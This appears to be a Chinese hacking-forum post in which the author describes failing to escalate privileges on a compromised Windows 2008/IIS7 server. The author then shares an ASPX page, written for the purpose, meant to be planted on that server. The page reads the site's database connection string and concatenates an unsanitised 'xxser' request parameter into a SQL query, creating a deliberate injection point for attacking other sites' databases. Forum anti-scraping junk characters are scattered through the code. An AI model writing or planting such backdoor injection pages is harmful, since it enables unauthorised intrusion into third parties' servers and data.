利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
. C3 v1 A7 S& u: f- \其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。
% A: k, r. {' A4 M/ ?' g+ {
% `( ?* |! R! q% p$ n​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
6 ~. |, @2 e+ j- ^: ?  ?3 [    <title>暗影aspx构造注射专用页面</title>
. V6 E, P8 n4 H; t2 o</head>
- w. F2 ~0 q% X1 E" X. M<body>
7 Q' u0 c( Y2 n3 w    <form id="form1" runat="server">
- W! N  }5 P0 W    <div>
# S# n, f  N% S% _; U; i     <script language="c#" runat="server">
            
# x7 h0 o0 F& L5 b" r* C% n+ A         void page_init(object sender, EventArgs e)
         {
            
9 J& O/ @3 a  C' w& b/ t             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
. O* a8 q. ^; z8 Q3 v3 `' j! H            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
2 D6 l" d8 y8 H  r4 w             conn.Open();
2 M  \3 t) C  K/ F4 d" y% u            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
* R/ e# Y3 N6 U- p# L            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
$ C9 J+ `% e' m! M, h( k9 R             Response.Write(i+"\n");
             Response.Write(x);
. B1 ]" D, _: M/ ^. _* c+ L; b) @             conn.Close();
         }
6 x/ V  N- ?' u% `  f     
  </script>
    </div>
$ t, {8 B5 s4 F4 u5 v# c    </form>
</body>
0 m, z( l4 z: Y- \$ m% u</html>